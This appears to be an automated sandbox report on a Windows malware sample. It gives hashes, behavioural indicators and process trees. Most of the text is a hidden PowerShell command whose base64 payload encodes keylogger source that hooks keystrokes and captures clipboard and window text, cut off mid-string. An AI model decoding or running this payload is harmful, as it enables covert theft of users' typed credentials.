f7c1423cc7223b0490b8e98cb656a09eef624c9d0e1f00445031b1c635692b5d

General

Target

bb90548c9c0dd6e411c236b55004a392.exe
Size

388KB
MD5

bb90548c9c0dd6e411c236b55004a392
SHA1

1e1db20778c735c26ac2411fa565a1ff43405327
SHA256

f7c1423cc7223b0490b8e98cb656a09eef624c9d0e1f00445031b1c635692b5d
SHA512

12ba06a936605a3ec6873489c863b1e922e2f989d4cab5c73936f6e9699e6a6760a8c001cfbe2ad7cad007b573f563fbea74125abc547eda409403cc4cf05231
SSDEEP

6144:pOYGXaPNxdgSdcq2pVZPOJHAbKSXXDYrM2Vfmq7k3ivPjVbdgZK:1GqN/XdctpVtkiXXDCOZij3Z

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4608	3928	wscript.exe	50
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	204	3928	powershell.exe	50

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	4608	wscript.exe
440	4608	wscript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	bb90548c9c0dd6e411c236b55004a392.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
204	powershell.exe
204	powershell.exe
204	powershell.exe
204	powershell.exe
204	powershell.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1528	wscript.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	204	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
204	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 4852 wrote to memory of 1528	4852	bb90548c9c0dd6e411c236b55004a392.exe	83
PID 4852 wrote to memory of 1528	4852	bb90548c9c0dd6e411c236b55004a392.exe	83
PID 4852 wrote to memory of 1528	4852	bb90548c9c0dd6e411c236b55004a392.exe	83
PID 204 wrote to memory of 2112	204	powershell.exe	88
PID 204 wrote to memory of 2112	204	powershell.exe	88
PID 2112 wrote to memory of 5060	2112	csc.exe	89
PID 2112 wrote to memory of 5060	2112	csc.exe	89

C:\Users\Admin\AppData\Local\Temp\bb90548c9c0dd6e411c236b55004a392.exe
"C:\Users\Admin\AppData\Local\Temp\bb90548c9c0dd6e411c236b55004a392.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4852
- C:\Windows\SysWOW64\wscript.exe
  "C:\Windows\System32\wscript.exe" 2815614063.js 32 "C:\Users\Admin\AppData\Local\Temp\bb90548c9c0dd6e411c236b55004a392.exe"
  2⤵
  - Modifies registry class
  - Suspicious behavior: RenamesItself
  PID:1528

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\26355f790.js" 32
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGoAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABkADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABqADMAIABiADQAIAA9ACAAagA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAagA2ACAAZQA3ACAAPQAgAGoAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAbwA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABoADEAMAAgAG0AMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAHAAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGIAMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGsAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGkAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGUAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABwADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAaAAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABoADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAbwAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGMAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABlADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYwAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGUAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABrADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGIAMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGEAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGYAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABkADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGgAMQAwACAAagAzADUAKQB7AG0AMQAxACAAPQAgAGoAMwA1ADsAZQAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGgAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AGwAMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAGgAMQA5ADsAZQAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAXwBfAFUASQBEAF8ARQBOAFYAXwBWAEEAUgBfAF8AIgApADsAaQBmACAAKABlADIANgAgAD0APQAgAG4AdQBsAGwAKQAgAGUAMgA2ACAAPQAgACIAMQAyADMANAA1ADYANwA4ACIAOwBoADIAMQAgAD0AIABlADIANgAgACsAIAAiAGEAIgA7AG8AMgAyACAAPQAgAGUAMgA2ACAAKwAgACIAZAAiADsAYwAyADMAIAA9ACAAZQAyADYAIAArACAAIgBzACIAOwBlADIANAAgAD0AIABlADIANgAgACsAIAAiAG0AIgA7AHUAaQBuAHQAIABuADMANgAgAD0AIABPAHAAZQBuAE0AdQB0AGUAeAAoADAAeAAwADAAMQAwADAAMAAwADAALAAgAGYAYQBsAHMAZQAsACAAZQAyADQAKQA7AGkAZgAgACgAbgAzADYAIAAhAD0AIAAwACkAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwBDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAHQAcgB1AGUALAAgAGUAMgA0ACkAOwBrADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBpAGYAIAAoAFMAQwBhAHIAZABFAHMAdABhAGIAbABpAHMAaABDAG8AbgB0AGUAeAB0ACgAMgAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAG8AdQB0ACAAawAyADcAKQAgACEAPQAgADAAKQAgAGsAMgA3ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAMQA4ACAAPQAgACIAIgA7AGIAMQAzACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBuAHQAIABqADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAYgAxADMAKQA7AGoAMQA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGoAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABiADEAMwAsACAAagAxADYALAAgAGoAMwA3ACAAKwAgADEAKQA7AHUAaQBuAHQAIABrADEANAAgAD0AIAAwADsARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABiADEAMwAsACAAcgBlAGYAIABrADEANAApADsAUAByAG8AYwBlAHMAcwAgAGgAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAawAxADQAKQA7AGkAZgAgACgAaAAzADgAIAAhAD0AIABuAHUAbABsACkAIABjADIANQAgAD0AIABoADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGMAMgA1ACAAPQAgACIAIgA7AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAAwACwAIABlADcALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACkAOwBvADkAIAA9ACAAYQAzADkAKABiADQAKQA7AEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFIAdQBuACgAKQA7AFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABvADkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABhADMAOQAoAGoAMwAgAGIANAApAHsASQBuAHQAUAB0AHIAIABwADQAMAAgAD0AIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAFAAcgBvAGMAZQBzAHMALgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAE0AbwBkAHUAbABlAE4AYQBtAGUAKQA7AHIAZQB0AHUAcgBuACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoADEAMwAsACAAYgA0ACwAIABwADQAMAAsACAAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAbQA0ADEAKABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAZgA0ADIALAAgAHMAdAByAGkAbgBnACAAZAA0ADMALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABjADQANAApAHsAdAByAHkAewBzAHQAcgBpAG4AZwAgAGUANAA1AGQAYQB0AGEAXwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABsADIAMAAsACAAaAAyADEALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGUANAA1AGQAYQB0AGEAXwAgAD0AIABlADQANQBkAGEAdABhAF8AIAArACAARABhAHQAZQBUAGkAbQBlAC4ATgBvAHcAIAArACAAIgAgAFsAIgAgACsAIABmADQAMgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgBdACAALQAgACIAIAArACAAZAA0ADMAIAArACAAIgBcAHIAXABuACIAIAArACAAYwA0ADQALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXAByAFwAbgBcAHIAXABuACIAOwBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABsADIAMAAsACAAaAAyADEALAAgAGUANAA1AGQAYQB0AGEAXwApADsAfQBjAGEAdABjAGgAIAB7ACAAfQB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGkAbgB0ACAAaAA0ADYAKABJAG4AdABQAHQAcgAgAGUANAA3ACkAewByAGUAdAB1AHIAbgAgAE0AYQByAHMAaABhAGwALgBSAGUAYQBkAEkAbgB0ADMAMgAoAGUANAA3ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABkAGUAbABlAGcAYQB0AGUAIABJAG4AdABQAHQAcgAgAGoAMwAoAGkAbgB0ACAAZgA0ADgALAAgAEkAbgB0AFAAdAByACAAcAA0ADkALAAgAEkAbgB0AFAAdAByACAAaQA1ADAAKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdQBpAG4AdAAgAGoANgAoAEkAbgB0AFAAdAByACAAcABQAGEAcgBhAG0AKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdgBvAGkAZAAgAGgAMQAwACgAKQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAagA1ACgAaQBuAHQAIABmADQAOAAsACAASQBuAHQAUAB0AHIAIABwADQAOQAsACAASQBuAHQAUAB0AHIAIABpADUAMAApAHsAaQBmACAAKABmADQAOAAgAD4APQAgADAAIAAmACYAIABwADQAOQAgAD0APQAgACgASQBuAHQAUAB0AHIAKQAwAHgAMAAxADAAMAApAHsAaQBuAHQAIABuADUAMQAgAD0AIABoADQANgAoAGkANQAwACkAOwBpAGYAIAAoAG4ANQAxACAAPAAgADgAKQAgAHIAZQB0AHUAcgBuACAAQwBhAGwAbABOAGUAeAB0AEgAbwBvAGsARQB4ACgAbwA5ACwAIABmADQAOAAsACAAcAA0ADkALAAgAGkANQAwACkAOwBtADEAMQAoACkAOwBiAG8AbwBsACAAbAA1ADIAIAA9ACAAKABuADUAMQAgAD0APQAgADgAKQA7AGIAbwBvAGwAIABqADUAMwAgAD0AIAAoAG4ANQAxACAAPQA9ACAANAA2ACkAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAcAA1ADQAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGIAeQB0AGUAWwBdACAAaAA1ADUAIAAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwAyADUANQBdADsAaQBmACAAKABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAaAA1ADUAKQApAHsAdQBpAG4AdAAgAG4ANQA2ACAAPQAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABuADUAMQAsACAAMwApADsAcAAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwB1AGkAbgB0ACAAbgA1ADcAIAA9ACAAMAA7AHUAaQBuAHQAIABiADUAOAAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAHAAMQAyACwAIAByAGUAZgAgAG4ANQA3ACkAOwB1AGkAbgB0ACAAbQA1ADkAIAA9ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAYgA1ADgAKQA7AGkAZgAgACgAbAA1ADIAIAB8AHwAIABqADUAMwAgAHwAfAAgACgAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAbgA1ADEALAAgAG4ANQA2ACwAIABoADUANQAsACAAcAA1ADQALAAgAHAANQA0AC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAoAHUAaQBuAHQAKQAwACwAIABtADUAOQApACAAPgAgADAAKQApAHsAaQBuAHQAIABqADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAcAAxADIAKQA7AGkAMQA1ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGoAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABwADEAMgAsACAAaQAxADUALAAgAGoAMwA3ACAAKwAgADEAKQA7AGkAZgAgACgAKABuADUANwAgACEAPQAgAGsAMQA0ACkAIAB8AHwAIAAoAHAAMQAyACAAIQA9ACAAYgAxADMAKQAgAHwAfAAgACgAagAxADYALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAIQA9ACAAaQAxADUALgBUAG8AUwB0AHIAaQBuAGcAKAApACkAKQB7AG0ANAAxACgAagAxADYALAAgAGMAMgA1ACwAIABlADEANwApADsAagAxADYALgBSAGUAbQBvAHYAZQAoADAALAAgAGoAMQA2AC4ATABlAG4AZwB0AGgAKQA7AGoAMQA2AC4AQQBwAHAAZQBuAGQAKABpADEANQApADsAZQAxADcALgBSAGUAbQBvAHYAZQAoADAALAAgAGUAMQA3AC4ATABlAG4AZwB0AGgAKQA7AGIAMQAzACAAPQAgAHAAMQAyADsAUAByAG8AYwBlAHMAcwAgAGgAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAbgA1ADcAKQA7AGkAZgAgACgAaAAzADgAIAAhAD0AIABuAHUAbABsACkAIABjADIANQAgAD0AIABoADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGMAMgA1ACAAPQAgACIAIgA7AGsAMQA0ACAAPQAgAG4ANQA3ADsAfQBpAGYAIAAoAG4ANQAxACAAPgAgADcAKQB7AGkAZgAgACgAbAA1ADIAKQAgAGUAMQA3AC4AQQBwAHAAZQBuAGQAKAAiAFsAqwBdACIAKQA7AGUAbABzAGUAIABpAGYAIAAoAGoANQAzACkAIABlADEANwAuAEEAcABwAGUAbgBkACgAIgBbAGQAZQBsAF0AIgApADsAZQBsAHMAZQAgAGUAMQA3AC4AQQBwAHAAZQBuAGQAKABwADUANAApADsAfQB9AH0AfQByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAG8AOQAsACAAZgA0ADgALAAgAHAANAA5ACwAIABpADUAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAgAGgANgAwACgAYgB5AHQAZQBbAF0AIABtADYAMQApAHsAcwB0AHIAaQBuAGcAIABuADYAMgAgAD0AIABFAG4AYwBvAGQAaQBuAGcALgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAG0ANgAxACkAOwBpAGYAIAAoAHMAdAByAGkAbgBnAC4ASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoAG4ANgAyACkAKQAgAHIAZQB0AHUAcgBuACAAbgBlAHcAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAoACkAOwByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKABuADYAMgAuAFMAcABsAGkAdAAoAG4AZQB3ACAAYwBoAGEAcgBbAF0AIAB7ACAAJwBcADAAJwAgAH0ALAAgAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAC4AUgBlAG0AbwB2AGUARQBtAHAAdAB5AEUAbgB0AHIAaQBlAHMAKQApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB1AGkAbgB0ACAAagA4ACgASQBuAHQAUAB0AHIAIABmADYAMwApAHsAYgBvAG8AbAAgAGgANgA0ACAAPQAgAHQAcgB1AGUAOwBzAHQAcgBpAG4AZwAgAGQANgA1ADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGsANgA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwB3AGgAaQBsAGUAIAAoAGgANgA0ACkAewBzAHQAcgBpAG4AZwAgAGwANgA3ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEcAZQB0AFYAYQBsAHUAZQAoAGwAMgAwACwAIABjADIAMwAsACAAIgAiACkALgBUAG8AUwB0AHIAaQBuAGcAKAApADsAaQBmACAAKABsADYANwAgACEAPQAgACIAIgApAHsAUgBlAGcAaQBzAHQAcgB5AEsAZQB5ACAAawA2ADgAIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4AQwB1AHIAcgBlAG4AdABVAHMAZQByAC4ATwBwAGUAbgBTAHUAYgBLAGUAeQAoAGgAMQA5ACwAIAB0AHIAdQBlACkAOwBpAGYAIAAoAGsANgA4ACAAIQA9ACAAbgB1AGwAbAApAHsAawA2ADgALgBEAGUAbABlAHQAZQBWAGEAbAB1AGUAKABjADIAMwApADsAawA2ADgALgBDAGwAbwBzAGUAKAApADsAfQBFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwB9AGkAZgAgACgAQwBsAGkAcABiAG8AYQByAGQALgBDAG8AbgB0AGEAaQBuAHMAVABlAHgAdAAoACkAIAA9AD0AIAB0AHIAdQBlACkAewBkADYANQAgAD0AIABDAGwAaQBwAGIAbwBhAHIAZAAuAEcAZQB0AFQAZQB4AHQAKAApADsAaQBmACAAKABkADYANQAgACEAPQAgAHAAMQA4ACkAewBzAHQAcgBpAG4AZwAgAHAANgA5ACAAPQAgACIAIgA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABrADcAMAAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAcAAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwBpAGYAIAAoAHAAMQAyACAAIQA9ACAAMAApAHsAaQBuAHQAIABqADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAcAAxADIAKQA7AGsANwAwAC4AQwBhAHAAYQBjAGkAdAB5ACAAPQAgAGoAMwA3ACAAKwAgADEAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAcAAxADIALAAgAGsANwAwACwAIABqADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAXwBwAHIAbwBjAF8AaQBkAF8AIAA9ACAAMAA7AGkAZgAgACgARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABwADEAMgAsACAAcgBlAGYAIABfAHAAcgBvAGMAXwBpAGQAXwApACAAIQA9ACAAMAApAHsAUAByAG8AYwBlAHMAcwAgAGcANwAxACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAXwBwAHIAbwBjAF8AaQBkAF8AKQA7AGkAZgAgACgAZwA3ADEAIAAhAD0AIABuAHUAbABsACkAIABwADYAOQAgAD0AIABnADcAMQAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AH0AfQBrADcAMAAuAEEAcABwAGUAbgBkACgAIgAgADoAOgAgAEMAbABpAHAAYgBvAGEAcgBkACIAKQA7AGsANgA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABrADYANgAuAEwAZQBuAGcAdABoACkAOwBrADYANgAuAEEAcABwAGUAbgBkACgAZAA2ADUAKQA7AG0ANAAxACgAawA3ADAALAAgAHAANgA5ACwAIABrADYANgApADsAcAAxADgAIAA9ACAAZAA2ADUAOwB9AH0AcwB0AHIAaQBuAGcAIABoADcAMgAgAD0AIAAiACIAOwBiADIAOAAgAGkANwAzADsAaQBmACAAKABrADIANwAgACEAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApAHsAdQBpAG4AdAAgAG8ANwA0ACAAPQAgADEAMAAwADAAMAA7AGIAeQB0AGUAWwBdACAAZQA3ADUAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAbwA3ADQAXQA7AGkAZgAgACgAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAGsAMgA3ACwAIABuAHUAbABsACwAIABlADcANQAsACAAbwB1AHQAIABvADcANAApACAAPQA9ACAAMAApAHsATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABjADcANgAgAD0AIABoADYAMAAoAGUANwA1ACkAOwBpAG4AdAAgAGcANwA3ACAAPQAgAGMANwA2AC4AQwBvAHUAbgB0ADsAaQBmACAAKABnADcANwAgAD4AIAAwACkAewBpAG4AdAAgAGgANwA4ACAAPQAgADAAOwBiADIAOABbAF0AIABhADcAOQAgAD0AIABuAGUAdwAgAGIAMgA4AFsAZwA3ADcAXQA7AGYAbwByAGUAYQBjAGgAIAAoAHMAdAByAGkAbgBnACAAYgA4ADAAIABpAG4AIABjADcANgApAHsAYQA3ADk